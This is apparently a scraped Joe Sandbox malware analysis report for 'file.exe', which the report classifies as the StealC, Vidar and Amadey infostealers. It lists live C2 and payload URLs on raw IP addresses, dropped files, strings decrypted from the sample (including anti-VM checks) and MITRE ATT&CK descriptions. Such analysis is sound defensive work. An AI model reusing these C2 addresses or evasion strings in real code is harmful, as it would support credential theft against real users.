Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll_k	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll(	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dlljk	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00	Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpon	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00	Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exepera	Avira URL Cloud: Label: phishing
Source: http://85.28.47.4	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData	Avira URL Cloud: Label: phishing

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen

Source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.file.exe.360000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.4616.14.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Joe Sandbox ML: detected

Source: 0.2.file.exe.360000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.360000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.360000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.360000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.360000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.360000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.360000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.360000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.360000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.360000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.360000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.360000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.360000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.360000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.360000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.360000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.360000.0.unpack	String decryptor: http://85.28.47.4
Source: 0.2.file.exe.360000.0.unpack	String decryptor: /920475a59bac849d.php
Source: 0.2.file.exe.360000.0.unpack	String decryptor: /69934896f997d5bb/
Source: 0.2.file.exe.360000.0.unpack	String decryptor: jony
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.360000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.360000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.360000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.360000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.360000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.360000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.360000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.360000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.360000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.360000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.360000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.360000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.360000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.360000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.360000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.360000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.360000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.360000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.360000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.360000.0.unpack	String decryptor: DeleteObject

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGDGHJEHJJDAAAKEBGCFCAAAAE

C:\ProgramData\CGDBFBGIDHCAAKEBAKFIIIEBAA

C:\ProgramData\DGCFHIDA

C:\ProgramData\EBGDAAKJJDAAKFHJKJKF

C:\ProgramData\HJJEGIEHIJKKFIDHDGID

C:\ProgramData\HJKJEHJKJEBGHJJKEBGI

C:\ProgramData\KECBKKEBKEBFCAAAEGDHDGIIJE

C:\ProgramData\KFIIJJJDGCBAAKFIIECGCFBAFB

C:\ProgramData\KJEBKJDA

C:\ProgramData\freebl3.dll

Windows Analysis Report
file.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre